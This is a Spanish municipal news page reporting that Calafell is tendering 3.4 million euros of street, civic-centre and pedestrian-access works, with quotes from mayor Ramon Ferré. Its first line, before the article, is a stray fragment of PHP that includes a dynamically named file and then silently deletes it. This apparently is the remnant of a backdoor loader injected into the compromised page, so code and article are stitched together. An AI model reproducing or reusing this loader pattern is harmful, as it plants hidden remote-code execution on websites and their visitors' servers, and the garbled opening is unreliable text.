");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Calafell saca a licitación un paquete de obras para la renovación de calles y mejora vial
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

Calafell saca a licitación un paquete de obras para la renovación de calles y mejora vial (22/11/2021)

El Ayuntamiento de Calafell sacará a licitación en los próximos días un paquete de obras por importe de 3,4 millones de euros. Son tres proyectos: dos de ellos de renovación de calles y mejora vial y el tercero, de creación de espacios cívicos y culturales. Las tres obras son las siguientes:

- Primera fase del proyecto de mejora de las calles del centro de Segur, entre la vía del tren y la carretera C-31. Esta primera fase incluye la calle Baixador, entre la calle Pisuerga y la plaza Lola Boronat, y el pasaje Baixador. Importe: 1,4 millones de euros. Cuando acabe habrá una segunda fase de un importe equivalente, que incluirá la calle Emigdio Rodríguez Pita (hasta la calle Pisuerga), la calle Segura y la calle Júcar.
- Construcción del nuevo centro cívico de Valldemar, Montmar y Brises. Importe: 1,3 millones de euros. El equipamiento se levantará en un solar municipal de la calle Molina. El edificio ocupará una superficie de unos 400 metros cuadrados edificados en una sola planta. Habrá un bar, para dar vida cada día al espacio, y dos salas para actividades: una grande, polivalente; y una más pequeña, pensada más bien para reuniones. Además habrá unos vestuarios y duchas, ya que en el exterior se realizará una pista polideportiva del estilo de los Cruyff Courts.
- Creación de un nuevo acceso peatonal a la Ciutadella Ibérica. Importe: 0.7 millones de euros. Será un acceso más llano y seguro que, en el futuro, se integrará en la conversión de la C-31 en una vía urbana. La obra se financia con una aportación del Plan Único de Obras y Servicios de Catalunya.

El alcalde de Calafell, Ramon Ferré, explica que se trata de “actuaciones muy importantes, tanto por su coste económico como por su repercusión e impacto”. Ferré añade "acabar el centro de Segur y hacer un centro cívico en lo más alto del municipio son reivindicaciones históricas de los respectivos vecindarios, que ahora quedarán satisfechas".

Por su parte, “la mejora del acceso a la Ciutadella es muy necesaria, puesto que la actual forma de ir a pie no es la óptima. Pero es más, haremos una obra con visión de futuro, puesto que más adelante podrá integrarse en el nuevo vial que reclamamos a la Generalitat para este tramo del actual C-31”, concluye el alcalde.

Fuente: Ayuntamiento de Calafell

Calafell saca a licitación un paquete de obras para la renovación de calles y mejora vial

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona